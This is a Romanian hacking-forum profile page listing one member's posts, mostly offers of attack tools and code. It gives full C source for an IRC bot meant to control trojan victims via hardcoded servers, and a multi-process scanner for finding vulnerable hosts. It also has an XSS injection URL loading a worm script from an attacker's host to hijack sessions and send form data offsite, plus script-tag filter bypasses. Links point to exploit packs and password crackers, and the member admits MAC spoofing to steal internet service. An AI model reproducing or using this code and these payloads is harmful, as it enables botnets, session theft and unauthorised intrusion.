SlicK
Active Members-
Posts
350 -
Joined
-
Last visited
-
Days Won
5
Everything posted by SlicK
-
Ar mai fi si Satanic Socks Server v0.66.170506 facut de drmist (?) Sursa: http://rootb0x.com/sss.c (self explanatory) Bynary: http://rootb0x.com/sss (compilat cu setarile default: port= 3003,user=login,parola=pass)
-
Vreo 20 de jocuri flash care mi-au mers pe Samsung D600... http://rootb0x.com/javag.rar
-
Poliþia ºi serviciile secrete dezvoltã
SlicK replied to amprenta's topic in Stiri securitate
Sunt fericit ca m-am nascut in secolul asta ca cine stie poate peste cativa ani or sa inceapa sa implanteaze trojane la nastere -
Dupa cum vezi toolul a implinit deja 5 ani deci exploiturile folosite cam vechi. Knock yourself out http://packetstormsecurity.org/0209-exploits/massrooter.tar.gz
-
Observ ca a disparut forumul "sugestii" deci am facut un Thread! In primul rand vad ca nu mai exista optunea "marcheaza toate forumurile/subiectele ca fiind citite", mie mi se parea foarte folositoare. In al doilea rand ii sugerez lui sysgh0st sa nu mai foloseasca @yahoo.com sau un alt webmail free ci mai degraba "mesaj privat" pentru ca o simpla vulnerabilitate poate duce la compromiterea site-ului dupa cum s-a vazut si la zone-h.org cu hotmail. Cya LATER EDIT: OOPS, nu am vazut ca exista o sectiune speciala pe pagina principala, scuze, inca mai explorez site-ul
-
PunjabHaker: Imi cer scuze daca "[+] Usage: ./s [ip file]" nu te-a lamurit... s.txt trebuie sa contina ip-urile pe care vrei sa le testezi cu vulnerabilitatea specificata. x0xboy: din nu stiu ce motiv au disparut foarte multe ';' incearca versiunea asta http://rootb0x.com/scan.c sysgh0st: Felicitari pentru pozitia de "Super Administrator"! Din cate se pare te descurci destul de bine. Sunt sigur ca exemplul meu poate fi facut poate mult mai bine si in alte limbaje de programare dar unde ar mai fi diversitatea? C-ul este un limbaj mult mai "low level" si mai vechi decat multe altele si de altfel sta la baza sistemelor de operare UNIX(sunt sigur ca stiai asta deja . Parea mea e ca daca stii C poti invata cu usurinta orice alt limbaj "high level" si-ti poti exporta ideile in acel limbaj. Oricum scopul meu cred ca a fost destul de clar: vreau sa micsorez comunitatea de skiddie si sa o maresc pe cea de coderi.
-
al3x poti incerca aici http://www.dyndns.com/services/dns/dyndns/ sunt numerosi provideri de servicii asemanatoare. Personal nu am incercat niciodata deci nu da vina pe mine daca nu-ti merge
-
Ummm, Welcome back! Stiu ca a fost un efort destul de mare din partea adminilor sa ridice saitu asta sus si parerea mea e faptul cum arata are mica importanta, conteaza continutul! Oricum ma bucur ca a devenit "Ethical Hacking" si ca a disparut lamereala din 'Club Show OFF" sau cum era. Insa ideea e aceeasi faceti ce faceati si inainte doar ca nu va mai laudati ca aveti # pe 'x.y.z.w.edu', insa diferenta dintre "Hacking" si "Etical Hacking" e intr-un fel ca diferenta dintre mastubare si mersul la prostituate... rezultatul e acelasi doar ca unul este legal celalalt nu . A si inca ceva...daca se poate nu mai cereti "root" pentru ca nu stiu cati sunt dispusi sa va dea doar pentru faptul ca 'nu aveti cu ce scana'... Well, e ora 7 dimineata ma apuc sa postez si eu putin pana nu ma ia somnul PS:Sper sa nu-mi fac dusmani cu acest post
-
Foarte tare povestioara dar locul ei e undeva la "nuvele". No offense mi-a placut :@
-
bossjuan "http://www.sitevulnerabil.com/app.php" este doar un exemplu reprezentand o aplicatie vulnerabila la xss.
-
Vierme Ajax Proof of Concept. Credits: Anurag Agarwal, Download:'>http://www.attacklabs.com Download: Utilizare: -Fisierul'>http://www.rootb0x.com/worm.rar Utilizare: -Fisierul "worm.js" trebuie pus intr-o locatie offsite (de ex: -Printr-un'>http://siteulmeu.com/worm.js" -Printr-un XSS injectam viermele in sesiunea utilizatorului care nu banuieste nimic de ex: http://www.sitevulnerabil.com/app.php?id=<script src="http://siteulmeu.com/worm.js"></script><script language="javascript">create_object(); collect_links(); collect_forms();</script> -odata injectat viermele preia controlul total asupra sesiunii utilizatorului: inlocuieste fiecare link de pe pagina cu propria sa functie. atunci cand userul da click pe un link "infectat" viermele face un request catre acea pagina si o afiseaza userului infectand totodata si acea pagina. Inlocuieste proprietatea "action" a fiecarui formular cu o functie proprie. Atunci cand userul da submit pe acel formular datele introduse pot fi trimise intr-o locatie offsite controlata de atacator apoi isi continua activitatea in mod normal. Momentan viermele nu se poate raspandi in afara siteului unde a fost injectat initial, deasemenea din cate am vazut nu functioneaza pe pagini secure(https) Pentru informatii aditionale vizitati pagina autorului. PS: fisierul postat de mine a fost modificat fata de versiunea originala pentru a fi complet functional.
-
Ai dat direct copy paste nu? incearca sa inlocuiesti "s c r i p t" cu "script" :@ Eu nu am gasit alta solutie la filtrele astea.
-
incearca sa-i spui: say <script>alert('Santa is not real')</s c r i p t> :@
-
Ip-Range'urile alocate fiecarei tari... Am gasit-o prin calc si m-am gandit ca poate unii nu o au http://rootb0x.com/docs/geoip.rar
-
Bine ai venit stefanel Incepe cu http://rst-crew.net/forum/viewforum.php?f=15 si http://rst-crew.net/forum/viewforum.php?f=30 enjoy your stay!
-
brutus (pop3,ftp,imap,telnet,web) http://packetstormsecurity.org/Win/brutus-aet2.zip wbrute(html) http://packetstormsecurity.org/Crackers/wbrute.tar.gz
-
Un simplu bot de irc pentru windows. Util atunci cand vrei sa controlezi victima unui troian prin irc. #include <windows.h> #include <winsock.h> #include <stdio.h> bool IsAdmin(char String[1024]); // declaram functia int main() { char *Server[100]; //ipurile serverelor de irc int Port[30]; // si porturile Server[0]="38.113.209.54"; Port[0]=6667; //setam fiecare ip si port in parte Server[1]="64.18.128.86"; Port[1]=6667; Server[2]="64.161.255.200"; Port[2]=6667; Server[3]="66.175.96.86"; Port[3]=6667; Server[4]="66.197.0.145"; Port[4]=6667; Server[5]="69.16.172.34"; Port[5]=6667; Server[6]="216.171.237.218"; Port[6]=6667; Server[7]="193.109.122.67"; Port[7]=6667; Server[8]="193.110.95.1"; Port[8]=6667; Server[9]="194.109.20.90"; Port[9]=6667; Server[10]="195.47.220.2"; Port[10]=6667; Server[11]="195.54.102.4"; Port[11]=6667; Server[12]="195.68.221.221"; Port[12]=6667; Server[13]="195.68.221.222"; Port[13]=6667; Server[14]="195.144.12.5"; Port[14]=6667; Server[15]="195.197.175.21"; Port[15]=6667; Server[16]="195.204.1.130"; Port[16]=6667; Server[17]="195.204.1.132"; Port[17]=6667; Server[18]="129.27.9.248"; Port[18]=6667; Server[19]="161.53.178.240"; Port[19]=6667; char BaseChan[MAX_PATH]="#wbot"; //canalul initial unde intra botul char Chars[26]={'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','x','y','z','w'}; int ServerPos=0; //pozitia in lista de servere WSADATA wsd; SOCKET sock; struct sockaddr_in sockadd; bool Continue=false; char RecvBuff[1024]=""; char Nick[9]=""; char UserName[100]=""; char SendPong[MAX_PATH]; char SendNick[MAX_PATH]; char SendUser[MAX_PATH]; char SendChan[MAX_PATH]; char SendRaw[MAX_PATH]; char CmdStr[MAX_PATH]; char Command[MAX_PATH]; DWORD nUserName=sizeof(UserName); GetUserName(UserName,&nUserName); // extragem numele usrului care a rulat programul while(1) { sockadd.sin_family=AF_INET; sockadd.sin_port=htons(Port[serverPos]); sockadd.sin_addr.s_addr=inet_addr(Server[serverPos]); int ws=WSAStartup(MAKEWORD(2,2),&wsd); if(ws==NO_ERROR) { sock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,0,0,0); if(sock!=INVALID_SOCKET) { if(connect(sock,(SOCKADDR*)&sockadd,sizeof(sockadd))!= SOCKET_ERROR) //ne conectam la server { for(int i=0 ; i<8; i++) { Nick[i]=Chars[rand()%26]; } // creem un string cu caractere random(nick-ul) wsprintf(SendNick,"NICK %srn",Nick); //creem requestul pentru nick send(sock,SendNick,strlen(SendNick),0); //trimitem requestul wsprintf(SendUser,"USER %s %s@yahoo.com %s :%s is the best!rn",UserName,UserName,UserName,UserName); //creem requestul pt user send(sock,SendUser,strlen(SendUser),0); //trimitem requestul while(recv(sock,RecvBuff,sizeof(RecvBuff),0)>=0) //cat timp suntem conectati la server { Continue=false; strtok(RecvBuff,"r"); if(strncmp("PING :",RecvBuff,6)==0) // daca serverul trimite un ping { strncpy(RecvBuff,"PONG :",6); // raspundem cu pong wsprintf(SendPong,"%srn",RecvBuff); send(sock,SendPong,strlen(SendPong),0); } if(strstr(RecvBuff,"431") || strstr(RecvBuff,"432") || strstr(RecvBuff,"433") || strstr(RecvBuff,"436")) // eroare la nick { for(int i=0 ; i<8; i++) { Nick[i]=Chars[rand()%25]; } //creem un nou nick random wsprintf(SendNick,"NICK %srn",Nick); send(sock,SendNick,strlen(SendNick),0); } else if(strstr(RecvBuff,"ERROR") || strstr(RecvBuff,"-lined")) { Continue=false; break; } // eroare sau G-lined/Klined,etc.. else if(strstr(RecvBuff,"254") || strstr(RecvBuff,"004")) { Continue=true; break; } // totul e ok ZeroMemory(RecvBuff,sizeof(RecvBuff)); } if(Continue==true) // daca totul e ok { wsprintf(SendChan,"JOIN %srn",BaseChan); //creem requestul pentru join send(sock,SendChan,strlen(SendChan),0); //trimitem requestul while(recv(sock,RecvBuff,sizeof(RecvBuff),0)>=0) //cat timp suntem conectati la server { strtok(RecvBuff,"n"); if(strncmp("PING :",RecvBuff,6)==0) { strncpy(RecvBuff,"PONG :",6); wsprintf(SendPong,"%srn",RecvBuff); send(sock,SendPong,strlen(SendPong),0); } else if(strstr(RecvBuff,"PRIVMSG")) // la mesaje(chan sau prv) { if(IsAdmin(RecvBuff)==true) //daca cine trimite mesajul este un admin { ZeroMemory(CmdStr,sizeof(CmdStr)); int c=0,pos=strcspn(RecvBuff+1,":"); for(int i=pos+2;i<strlen(RecvBuff);i++) CmdStr[c++]=RecvBuff[i]; if(CmdStr[0]=='$') { ZeroMemory(Command,sizeof(Command)); int c=0,pos=strcspn(CmdStr," "); for(int i=0;i<pos;i++) Command[c++]=CmdStr[i]; if(strcmp(Command,"$raw")==0) { wsprintf(SendRaw,"%srn",strchr (CmdStr,' ')); // creem requestul cu comanda trimisa de admin send(sock,SendRaw,strlen(SendRaw),0); //trimitem requestul } } } } ZeroMemory(RecvBuff,sizeof(RecvBuff)); } closesocket(sock); //inchidem socketul WSACleanup(); if(ServerPos<19) ServerPos++; else ServerPos=0; // trecem la urmatorul server ( 19=nr de servere) } else { closesocket(sock); WSACleanup(); if(ServerPos<19) ServerPos++; else ServerPos=0; } } else { WSACleanup(); if(ServerPos<19) ServerPos++; else ServerPos=0; Sleep(10000); } } else { WSACleanup(); return 0; } } else { return 0; } } } bool IsAdmin(char String[1024]) // determina daca mesajul vine din partea unui admin { char *Admin[10]; char WhoSent[MAX_PATH]; int wsc=0; int pos1=strcspn(String,"@"); int pos2=strcspn(String," "); Admin[0]="admina.users.undernet.org"; Admin[1]="adminb.users.undernet.org"; Admin[2]="adminc.users.undernet.org"; for(int i=pos1+1; i<pos2; i++) { WhoSent[wsc]=String[i]; wsc++; } WhoSent[wsc]='
-
Scuze nu am stiut DELETE AT WILL!
-
Credits:Rudra (???) http://www.rootb0x.com/docs/donotmess.txt
-
Nu stiu cine e si nu stiu daca sunt cel mai in masura sa ridic problema asta insa cred ca 4n4rchyl04d3r e un fel de "post hunter" adica in vreo 2 ore a reusit sa dea reply la vreo 20-30 de topicuri de acum cateva luni majoritatea raspunsurilor fiind de maxim 2 randuri. Nu stiu daca am dreptate dar parearea mea e ca decat sa fac un comentariu de genul "cool",care practic nu ajuta la nimic, mai bine tac. Peace
-
Pentru ca http://bisa-ba.ca/cmd.do e down incearca cu php-shellul tau!
-
Acest program primeste ca parametru o lista de ipuri apoi testeaza fiecare ip pentru existenta anumitor fisiere. Nu este un scanner complet(si nu pretind ca este foarte corect). Disclaimer: Acest cod este doar demonstrativ, puteti face orice cu el(copiati-l,modificati-l) nu-mi pasa insa eu nu sunt raspunzator pentru eventualele actiuni daunatoare/ilegale pe care le alegeti sa le faceti. Am postat aceasta sursa pentru un singur motiv, acela ca atunci cand armatele de copii care cauta disperati scannere de tot felul numai pentru a avea mai multi botii pe irc decat "toarasii" vor renunta la a face acest lucru si vor incepe sa-si codeze(macar compileze) singuri programele poate vor realiza ca internetul este cu mult mai mare decat "./scan" si irc. Here it goes: //se compileaza astfel: gcc -o scan scan.c #include <stdio.h> #include <netdb.h> #include <arpa/inet.h> #define RMT_PORT 80 // portul http #define LOOK "200 OK" //raspunsul pe care il cautam #define LOG_FILE "scan.log" // fisierul log Chk(char *host) { struct sockaddr_in rmt_host; struct hostent *rh; FILE *LOG; char buffer[15]; // buffer pentru stocarea raspunsului serverului char *requ[255]; // array pentru stocarea requesturilor char *name[255]; // array pentru stocarea numelor fisierelor(pentru scrierea in log) int sock,i; memset(requ,0,255); //initializare cu 0 memset(name,0,255); memset(buffer,0,15); //setam fiecare request requ[1] ="GET /nodirectory/nofile.php HTTP/1.0nn"; //unele servere au raspunsuri custom pentru erorile gen 404 requ[2] ="GET /director1/fisier1.php HTTP/1.0nn"; requ[3] ="GET /director2/fisier2.php HTTP/1.0nn"; requ[4] ="GET /director3/fisier3.php HTTP/1.0nn"; requ[5] ="GET /director4/fisier4.php HTTP/1.0nn"; //setam fiecare nume name[1]=" /nodirectory/nofile.php"; name[2]=" /director1/fisier1.php"; name[3]=" /director2/fisier2.php"; name[4]=" /director3/fisier3.php"; name[5]=" /director4/fisier4.php"; if((LOG=fopen (LOG_FILE,"a"))==NULL) // deschidem logul pentru scriere { perror("[-] Cannot open log for writing!n"); exit(1); } if((rh=gethostbyname(host))==NULL) // numele hostului in functie de ip { printf("-"); exit(1); } printf("."); for(i=1 ; i<=5 ; i++) // tratam fiecare request in parte(5 in acest exemplu) { if((sock=socket(AF_INET,SOCK_STREAM,0))==-1) // deschidem socketul { printf("-"); exit(1); } bzero(&(rmt_host.sin_zero),8); rmt_host.sin_family = AF_INET; rmt_host.sin_addr=*((struct in_addr *)rh->h_addr); rmt_host.sin_port=htons(RMT_PORT); if(connect(sock,(struct sockaddr *)&rmt_host ,sizeof(rmt_host)) != 0) // ne conectam la server { printf("-"); exit(1); } send(sock,requ[i],sizeof(requ),0); // trimitem requestul recv(sock,buffer,sizeof(buffer),0); //citim raspunsul if((strstr(buffer,LOOK))!=0) // daca raspunsul contine stringul pe care il dorim("200 OK") { if (i!=1) //daca nu este gasit fisierul "nofile" { printf("X"); fputs(host,LOG); //scriem in log fputs(name[i],LOG); fputs("n",LOG); } else { exit(1); } } close(sock); // incidem socketul } fclose(LOG); //inchidem fisierul log } int main(int argc, char **argv) { FILE *In; // fisierul de intrare char LineBuffer[20]; // buffer pentru citirea din fisier int NumF=0; // numarul de procese, variaza in timpul rularii int MaxF; // numarul maxim de procese in acelasi timp if(argc!=2) // daca programul nu primeste nici un parametru { printf("[+] By YOUn"); printf("[+] Usage: %s [ip file]n",argv[0]); exit(0); } In=fopen (argv[1],"r"); // deschidem fisierul reprezentat de primul parametru if(In==NULL) // daca fisierul nu poate fi deschis { printf("[-] Cannot open %s for reading!n",argv[1]); exit(0); } printf("'x'=Found, '.'=not found, '-'=errorn"); MaxF=20; // setam numarul maxim de procese while(!feof(In)) // cat timp nu am ajuns la sfarsitul fisierului { fscanf(In,"%s",LineBuffer); // citim cate un rand if (!(fork())) // deschidem un proces nou { alarm(20); // timeout la 20 de secunde Chk(LineBuffer); // testam ipul alarm(0); exit(0); } else { NumF++; //crestem numarul de procese deschise if(NumF>MaxF) for(NumF; NumF>MaxF; NumF--) wait(NULL); //daca numarul de procese a depasit numarul maxim asteptam pana unul din ele se inchide } } } Daca am gresit ceva in acest cod pls anuntati-ma!
-
Mie chiar mi-a reusit. Nu mai platisem netul si bulangiul de admin mi-a scos macul din server. Am facut la fel ca mai sus si totul a fost frumos cateva saptamani pana s-a prins adminul si mi-a scos cablul de retea(a mai zis ca nu-mi mai da net cate zile o avea :@ ). acum mi-am luat zapp